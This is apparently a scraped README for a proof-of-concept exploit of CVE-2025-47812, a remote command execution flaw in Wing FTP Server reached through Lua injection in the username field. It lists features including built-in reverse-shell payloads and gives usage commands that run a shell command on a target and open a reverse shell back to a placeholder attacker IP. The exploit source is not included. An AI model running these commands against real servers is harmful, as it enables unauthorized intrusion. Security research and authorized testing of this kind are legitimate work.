Related vulnerabilities
Description
Remote Command Execution exploit for Wing FTP Server (CVE-2025-47812)
Introduction
# CVE-2025-47812 - Wing FTP Server RCE Exploit
This repository provides a proof-of-concept exploit for **CVE-2025-47812**, a remote command execution (RCE) vulnerability in **Wing FTP Server**. An attacker can inject Lua code through the `username` parameter during authentication and use it to execute arbitrary system commands, resulting in full remote code execution.
---
## 📌 Exploit Features
- 🔧 Remote execution of custom shell commands
- 🧬 Multiple built-in reverse shell payloads (bash, Python, netcat, etc.)
- 🪪 Automatic UID extraction from Set-Cookie
- 📦 Logs successful UIDs to `found_uids.txt`
- 🧪 Dry-run mode (no actual requests sent — test your input/output logic safely)
- 🔁 Retry logic on network failure
- 🧹 Cleaner payload formatting and readable output
- ✅ Input validation for IPs, ports, and URLs
- ⚙️ Command-line argument support for automated workflows
---
## 💻 Usage
**Execute a simple shell command:**
```bash
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
```
**Trigger a reverse shell:**
```bash
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
```
**Dry-run mode (no requests will be sent):**
```bash
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
```
## 🔄 Changes Made to the Original Exploit
| Feature/Improvement | Description |
|---------------------------|-----------------------------------------------------------------------------|
| ✅ **Argument Parsing** | Added `argparse` CLI support for non-interactive mode |
| 🔐 **Input Validation** | Ensures valid URL/IP/port before attempting exploit |
| 📦 **Header Refactoring** | Extracted HTTP headers into a reusable function for consistency |
| 📄 **UID Logging** | Saves successful UID tokens to `found_uids.txt` |
| 🧪 **Dry-Run Mode** | Allows safe testing without sending requests (`--dry-run`) |
| 🕒 **Timeout + Retries** | Adds request timeout and automatic retry attempts on failure |
| 🧼 **Payload Readability** | Reformatted the Lua injection string for clarity and maintenance |
| 📊 **Structured Output** | Wrapped server responses and payload info with delimiters for easy reading |
| ⚠️ **Status Code Checks** | Warns user if the target returns unexpected HTTP status codes |
| 📝 **Logging System** | Replaces `print()` with Python `logging` module for better verbosity control|
---
## ⚠️ Disclaimer
This project is intended for **educational and authorized security testing only**.
Do **not** use this tool against systems you do not own or have explicit permission to test.
---
File snapshot
[4.0K] /data/pocs/96bc979776d7c75cdbce6d1017e26ba83f15cff6
├── [6.0K] CVE-2025-47812.py
├── [1.0K] LICENSE
└── [2.8K] README.md
0 directories, 3 files